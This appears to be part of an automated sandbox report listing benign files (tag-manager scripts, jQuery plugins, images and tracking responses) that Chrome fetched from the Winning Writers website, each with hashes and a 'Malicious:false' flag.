                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1080x1080, components 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):228898
                                                                                                                                                                                            Entropy (8bit):7.957635301251326
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:Xpjh5ifpRwp+2SLS0leV+ejRHDKl3vsO36:XpjhaRgKTsVdyfsQ6
                                                                                                                                                                                            MD5:232AA14D5295D4280783237AF1EEA651
                                                                                                                                                                                            SHA1:880B467382822C2ACE32DA179024D8197D5567FB
                                                                                                                                                                                            SHA-256:CBED19EF4D8C17F56EB4B156E6CFC0087AAE90F8CEBBF7743DDF9DD3970CAFC8
                                                                                                                                                                                            SHA-512:692E2A728FFEFCD94A0DB42449E8FC9B66F0E234F6C7590A9E35E387F7B329141E3BB5423DE5465D3BA4C2A4D16B241FB7945707CE1D2D1451E86A28E8BC29FF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://scontent-ord5-1.cdninstagram.com/v/t51.2885-15/466498990_932073868801787_4615250428975556945_n.jpg?_nc_cat=108&ccb=1-7&_nc_sid=18de74&_nc_ohc=K2QYvU4QDFwQ7kNvgHexzPp&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYB6H6C6vXmQz4o0NOzYmapDE6_aoksGSCqZ4e0xcfBfbw&oe=6741529C
                                                                                                                                                                                            Preview:......JFIF.............C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..A.cFy."(%.....5....N...A.;.......o....V............c0.%..R..}.E..7..)..............*?.......:w..G.5..Ey?...E....>..I...?...........C.......Q...........*?..(.../.....4.................*?.......:w..G.5..E....E......&....w..........:w..G.4..S....gN.......>h..z.................~...S....gN........Jt?.............oO......?.......O.o.Jt?............N...A.;.......
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):3121
                                                                                                                                                                                            Entropy (8bit):5.078683738502872
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:NAvEI1gv+jyVx2BegHppvkMFALhoj9jtevxNEl/YuRlgaYyKTQgQpMvQ:BItyVx2cgHppvb6LhoBIN0/ZljDKVQpF
                                                                                                                                                                                            MD5:FF14E4812B7F512E620B1AD35542BCFC
                                                                                                                                                                                            SHA1:C40C5F777E7A2F63E7B731B3CDB1FE9C806B23AE
                                                                                                                                                                                            SHA-256:C4FB91BEFCF134B81ECFA1C586E1F9D6426C8F4FC1F6C130AC1FDDB49AB5DF96
                                                                                                                                                                                            SHA-512:59E0276314814C6E033FBC81AB9F2541A86BFB85FC263397D0E3F3C1A0CB0C8E5FE2F833998245462903D8A7E9E499D2685B8FC44964935AD282E4E175753D78
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/js/jquery.cookie.js
                                                                                                                                                                                            Preview:/*!. * jQuery Cookie Plugin v1.4.0. * https://github.com/carhartl/jquery-cookie. *. * Copyright 2013 Klaus Hartl. * Released under the MIT license. */.(function (factory) {..if (typeof define === 'function' && define.amd) {...// AMD...define(['jquery'], factory);..} else if (typeof exports === 'object') {...// CommonJS...factory(require('jquery'));..} else {...// Browser globals...factory(jQuery);..}.}(function ($) {...var pluses = /\+/g;...function encode(s) {...return config.raw ? s : encodeURIComponent(s);..}...function decode(s) {...return config.raw ? s : decodeURIComponent(s);..}...function stringifyCookieValue(value) {...return encode(config.json ? JSON.stringify(value) : String(value));..}...function parseCookieValue(s) {...if (s.indexOf('"') === 0) {....// This is a quoted cookie as according to RFC2068, unescape.......s = s.slice(1, -1).replace(/\\"/g, '"').replace(/\\\\/g, '\\');...}....try {....// Replace server-side written pluses with spaces.....// If we can't decode the
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4884), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4884
                                                                                                                                                                                            Entropy (8bit):5.816498046308927
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUqextytU7QgJ:1DY0h8Rx47OIqWbZTexty9I
                                                                                                                                                                                            MD5:E6B1CA71EBA4F307B0F44115B8D490E3
                                                                                                                                                                                            SHA1:43CAA4340A6F52EF9897A9D68CC154E331AA61E9
                                                                                                                                                                                            SHA-256:80AD51FDDEC50FD8DF42DEC60E0FDF22DFC98826993B8CF2EA0B80815A08356F
                                                                                                                                                                                            SHA-512:723D3A637DF461B549BB2BC0956DBB102F3B64E2A572A4DF9ED46693C6B5E355765FA548A3638692E5E55A77B8E892CE58010877BA081731D3F4D698C9CA99B3
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 980x450, components 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):129166
                                                                                                                                                                                            Entropy (8bit):7.947847746379115
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:kiqwrMqxg477wXVnJpnLJ+EAfve/vTowyuYvWZxx82zVqXHZaH9xLbr8Sry:FqlqxgDnvnTLvswyuHZFzV8obrHe
                                                                                                                                                                                            MD5:9A16A410E7886B0C632D76918FB2D3ED
                                                                                                                                                                                            SHA1:7E917285DCC54165CFC31AB578EB77AA178C279C
                                                                                                                                                                                            SHA-256:FC297C59E45A5B0D003CF84FB1F47451BB8D7B2CA11A119F1575DDBDBD0F9F21
                                                                                                                                                                                            SHA-512:ABCCEBC8CF6F3BD5601E3E0C9B787EAB0EEA6ECB8A56E2C7196EC66C2EC43C569F558DEBB44E9F64B06C7FBDEF3931464CBA1A07E33543F4325278670AB25AB3
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/graphics/tomstory/liu_home_page_slide.jpg
                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......Z......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:CD7654A112206811822AE8C6A079CFFF" xmpMM:DocumentID="xmp.did:E9B5A97A828611EF9F3CBEB41D1C8283" xmpMM:InstanceID="xmp.iid:E9B5A979828611EF9F3CBEB41D1C8283" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:53a0dae3-ce74-4b37-9fe2-55279ca55f85" stRef:documentID="adobe:docid:photoshop:d9ba6530-e9de-a44d-8d7f-b373b71e6c16"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4880), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4880
                                                                                                                                                                                            Entropy (8bit):5.817681427664876
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUtezAmtU7MN:1DY0h8Rx47OIqWbZcezAmnN
                                                                                                                                                                                            MD5:DBD0DB8F137A90E0F21CBF220D95627A
                                                                                                                                                                                            SHA1:4DBEFAC5346E30EA6C220B591B31ADC73243706C
                                                                                                                                                                                            SHA-256:7C18BD479E01B299D27582D5C5AF58DDA4E582431B1DFCD05553DE17489C0B99
                                                                                                                                                                                            SHA-512:EE921AFE03F25640064ABF72F176999D480D4236BBEA0A7429958AB11A0B4D2ED4950BCAE27AF39C77D60A734A2DD63F86F3977E7A1E04F79D568853C5C3DA96
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (521)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3381
                                                                                                                                                                                            Entropy (8bit):5.147445238900554
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:PfrrnJMia+5roHeCbMmQy/PFtFosTaajfNBvwE3:3rTJda+5roHDbMTy/TFosTaajfNBf
                                                                                                                                                                                            MD5:4D9A91BB66CFABD87602261B4B33D26A
                                                                                                                                                                                            SHA1:F52A9716BAFAE40D7F362E9A2499F9262FD682D6
                                                                                                                                                                                            SHA-256:78BF574AB08E486536EDF0D68A5B2CAD93E9DCAD0345E255E3428C51B6FC409E
                                                                                                                                                                                            SHA-512:1953DC44877E33CE905AAFF860813288B2504CA327A1293602C65E6276DF1B88C40304542CD57E011A85F1D9D93F8429871C588BCD9832B61BE93B5042DECFF0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/*.* jquery-match-height 0.7.2 by @liabru.* http://brm.io/jquery-match-height/.* License MIT.*/.!function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],t):"undefined"!=typeof module&&module.exports?module.exports=t(require("jquery")):t(jQuery)}(function(t){var e=-1,o=-1,n=function(t){return parseFloat(t)||0},a=function(e){var o=1,a=t(e),i=null,r=[];return a.each(function(){var e=t(this),a=e.offset().top-n(e.css("margin-top")),s=r.length>0?r[r.length-1]:null;null===s?r.push(e):Math.floor(Math.abs(i-a))<=o?r[r.length-1]=s.add(e):r.push(e),i=a}),r},i=function(e){var o={.byRow:!0,property:"height",target:null,remove:!1};return"object"==typeof e?t.extend(o,e):("boolean"==typeof e?o.byRow=e:"remove"===e&&(o.remove=!0),o)},r=t.fn.matchHeight=function(e){var o=i(e);if(o.remove){var n=this;return this.css(o.property,""),t.each(r._groups,function(t,e){e.elements=e.elements.not(n)}),this}return this.length<=1&&!o.target?this:(r._groups.push({elements:this,options:o}),r._
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/rul/1072733940?random=1731960030432&cv=11&fst=1731960030432&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4940), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4940
                                                                                                                                                                                            Entropy (8bit):5.815835538079968
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUWeOetU7B0:1DY0h8Rx47OIqWbZ3eOed
                                                                                                                                                                                            MD5:F70D93B880505CB7B8D6C11EF1F8459B
                                                                                                                                                                                            SHA1:378E727F9669B82992AF4D3C287AE341CB643E0A
                                                                                                                                                                                            SHA-256:6F0B6A1B098A65E08A165C623366C8DA73945BCDF17077C65E6488958CE399B8
                                                                                                                                                                                            SHA-512:82177F49BE03827E86DC20D0EBF1115A2EBE75E4E52A5DE4339A33A7E5DF2D10F352DF0CBDD39551827F701D5ECD81BD4AB210518B5E59AAB85A00FAE3E5A874
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 980x450, components 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):143476
                                                                                                                                                                                            Entropy (8bit):7.941841010920139
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:3xYSh6lEI9zg6UWhRbGi4maWQsBg7vKaJH:Oygg6UWhqWQ0+KS
                                                                                                                                                                                            MD5:11E157E66B1999F763538C0D576ABCF7
                                                                                                                                                                                            SHA1:6A68E7AF7BB0EBF576AD24989F592CF0C8C37854
                                                                                                                                                                                            SHA-256:60CD65CC1FFDDAC0ACD0874D0B99FEFEBBD09D3A46F393C1C0EFB5F9A5D79109
                                                                                                                                                                                            SHA-512:165379F7FBAB56033B64F05650C84EC17C55F1626A3563A38628470EBB614C8ECB119E1E7F8D6AE8CE2B13A7A9CCA7179F06F32D012CD1072F58A6100653243F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:CD7654A112206811822AE8C6A079CFFF" xmpMM:DocumentID="xmp.did:EBF07E8851D711EFBA20CF78438B8831" xmpMM:InstanceID="xmp.iid:EBF07E8751D711EFBA20CF78438B8831" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9f642b53-77ec-49cf-b5aa-b2fc8382dc41" stRef:documentID="adobe:docid:photoshop:93bd72ea-6557-5547-9f4b-831cf011a6ae"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (815)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):3501
                                                                                                                                                                                            Entropy (8bit):5.383873370647921
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:EI5cZUiKliCJ86U+QTEVWfeLwTauSEegdkZ5edOIC:EI5hiWNJ8kQTEVWfeUauRfdkZ5edO1
                                                                                                                                                                                            MD5:147FD3B00C22BA9C939712E9213C24CA
                                                                                                                                                                                            SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                                                                                                                                                            SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                                                                                                                                                            SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.googletagmanager.com/static/service_worker/4al0/sw_iframe.html?origin=https%3A%2F%2Fwinningwriters.com
                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/rul/1072733940?random=1731960070417&cv=11&fst=1731960070417&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/ga/rul?tid=G-S2XE0RVPX9&gacid=723902191.1731960008&gtm=45je4be0v889608727z8846709124za200zb846709124&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067554~102067808~102077855~102081484&z=645652693
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 183 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4515
                                                                                                                                                                                            Entropy (8bit):7.948013480889057
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:z/GaEIEr+KlP5E5iSYhk2kOXirYnzBlHsjoDQk62eg2M+UJ:DGMEK+hgzYh/bXi8zj6oJ
                                                                                                                                                                                            MD5:2E9E69518483ACFDADF0FDA57A2868B2
                                                                                                                                                                                            SHA1:5C9FEEFB75545730D2C0E4591990C9950F61FD3A
                                                                                                                                                                                            SHA-256:FE40CA1C8A95F7A6B1DC5BFC689AB5CCD565C199CB0FAE15F207F9F2E53C2673
                                                                                                                                                                                            SHA-512:7D2C05F8D129CB3ACCE077CCF3D466800B5EEA07601680447821F308B00136834D150822D7476E327FCDBB121A3ED869D53A9E11FB610E78E4D9D709D2C3AFC6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........(J....8IDAThC.[y.UE~...zE.AiT.E.i...a:@?.u#;....8....2Fi..d.x.N2:3.q.c.........`...fw.@....._...}u.=...k..9I>....{o.Z....WUO...6lXa^^.0).P%T.../...xa...IHk...o.~.Q..e..1.Kr..n.BC...J.A(C;.].......6.....#Ft....CQ_\.`.....iB|...jjnn>k._^....K<..M..nA.5J*.....5..6..K...O....Z..*.*L(.WA&Cn....Z.q..%d...z.. eJj%..r.u.....(.p..O..q.\....?..~..........x.Ik..HZ....;e(4.%.k.R@}*.\$.....s&...x.."4CH.=.o.IN....,.........9.r.T4..J....O-...&.....O..s1..4.I..s..W}../...%... s!1.K...WA....E8%7I......+((0.$=..O.t......&...1%.......hX4.C(..B..i.w..)TU.(...Eh.2....`/....T-n.....TDs....F......U...7).\...s...h..R.|..f.I.,...|.q....C.....Qg.6.zZGG..LRV.7^.....jYi.b`...3fL....%h..Y....C.ZUUU>.d...<.!6....,;.`..F...b.{.....N.M....].a...}=..-....w..I..zB>.dKl.V.v.....$64u..M`.?UZ..A7...S...Kz<._.c.1.N..d...Q....&..F..y..Q..I.LR.....G....a.)9G..-Fc..M...q..:t..{...~A.}.=..6./?.gq..)~
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):3175
                                                                                                                                                                                            Entropy (8bit):4.892567251072206
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:s06BApbDSL4+9KIb6TBaFJe/mSer80mADWEiumKZaIfWoGTfpgBfW0VMimdonoht:QmcIIbywF4JynpzUfTmcjJ
